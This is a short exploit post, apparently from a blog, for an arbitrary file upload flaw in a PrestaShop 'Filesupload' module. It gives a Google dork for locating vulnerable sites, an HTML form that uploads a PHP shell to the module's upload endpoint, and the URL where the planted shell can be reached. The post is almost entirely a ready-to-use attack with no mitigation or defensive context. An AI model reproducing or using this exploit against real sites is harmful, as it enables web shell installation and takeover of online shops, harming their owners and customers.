Unknown On 15/08/16

# Exploit Title: Prestashop Customers Filesupload Arbitrary File Upload
# Google Dork: inurl:/module/filesupload/
# Date: 15/08/2016
# Software Link: http://addons.prestashop.com/en/4270-files-upload.html
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

Exploit CSRF :

<form method="post" action="http://site.com/path/" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="nameshell in here.php" />
<input type="submit"></input></input></form>


Poc :
http://site.com/path/modulefilesupload/upload.php


Shell Path :
http://site.com/path/modulefilesupload/uploads/nameshell in here.php

Leave a Reply

Subscribe to Posts | Subscribe to Comments